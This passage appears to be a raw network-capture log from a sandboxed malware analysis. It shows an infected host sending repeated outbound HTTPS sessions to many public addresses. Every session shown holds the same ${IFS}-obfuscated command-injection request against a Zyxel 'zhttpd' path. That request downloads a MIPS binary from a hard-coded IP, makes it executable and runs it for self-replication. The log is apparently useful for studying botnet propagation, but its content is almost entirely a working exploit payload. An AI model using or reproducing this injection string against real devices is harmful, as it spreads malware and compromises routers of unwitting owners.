                                                Jan 29, 2024 07:07:38.111692905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1820192.168.2.233672450.159.100.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111761093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1821192.168.2.233775472.46.227.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111836910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1822192.168.2.235532086.20.234.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111903906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1823192.168.2.2356290163.232.163.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.111955881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1824192.168.2.235373070.193.91.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112004042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1825192.168.2.2333864156.253.84.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112090111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1826192.168.2.2352764207.180.173.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112128973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1827192.168.2.235992677.46.26.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112189054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1828192.168.2.234083419.245.57.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112255096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1829192.168.2.234060292.217.13.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112296104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1830192.168.2.2355564208.187.20.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112370014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1831192.168.2.2344038168.105.176.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112422943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1832192.168.2.2338470169.148.116.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112493992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1833192.168.2.2340080196.106.83.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112552881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1834192.168.2.234362017.124.192.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112633944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1835192.168.2.2357818121.196.121.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112703085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1836192.168.2.2354744115.205.234.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112761021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1837192.168.2.235655848.51.74.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112843990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1838192.168.2.2353106161.16.124.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112894058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1839192.168.2.234504614.95.49.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112943888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1840192.168.2.234306054.219.173.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.112970114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1841192.168.2.234534890.187.183.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113049030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1842192.168.2.2356684195.205.101.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113115072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1843192.168.2.233537072.156.54.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113179922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1844192.168.2.2348572222.105.80.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113235950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1845192.168.2.23374689.35.110.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113298893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1846192.168.2.235489446.125.179.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113362074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1847192.168.2.2340168221.160.204.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113430977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1848192.168.2.2335424149.33.27.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113470078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1849192.168.2.2337596117.56.46.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113528013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1850192.168.2.2339766115.5.80.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113604069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1851192.168.2.2350454161.241.172.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113660097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1852192.168.2.2359076153.203.164.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113738060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1853192.168.2.2359674220.57.73.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113785028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1854192.168.2.2355172113.244.34.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113858938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1855192.168.2.235182025.18.130.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113931894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1856192.168.2.2343600189.21.35.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.113995075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1857192.168.2.23376565.2.253.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114073038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1858192.168.2.2344048209.71.104.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114137888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1859192.168.2.2345748122.128.6.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114216089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1860192.168.2.2350350117.86.76.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114278078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1861192.168.2.234452424.82.39.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114326000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1862192.168.2.2340618134.192.136.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114398956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1863192.168.2.235070827.100.85.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114445925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1864192.168.2.235949089.209.39.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114492893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1865192.168.2.2350798133.37.10.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114541054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1866192.168.2.233289452.200.145.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114600897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1867192.168.2.234361845.122.213.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114654064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1868192.168.2.235314449.200.21.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114702940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1869192.168.2.2345636105.156.49.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114777088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1870192.168.2.2336748211.214.50.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114844084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1871192.168.2.235900414.183.86.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114890099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1872192.168.2.2351844158.182.218.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.114962101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1873192.168.2.235266687.107.165.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115020037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1874192.168.2.2344176220.182.69.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115071058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1875192.168.2.235010684.8.152.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115124941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1876192.168.2.2360924198.190.134.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115170956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1877192.168.2.234876441.92.100.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115257978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1878192.168.2.2350112206.232.205.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115318060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1879192.168.2.2353846168.205.192.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115422964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1880192.168.2.233820662.201.251.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115470886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1881192.168.2.2356640191.240.68.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115513086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1882192.168.2.2354660192.202.151.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.115573883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1883192.168.2.2335154123.96.35.131443
                                                TimestampBytes transferredDirectionData
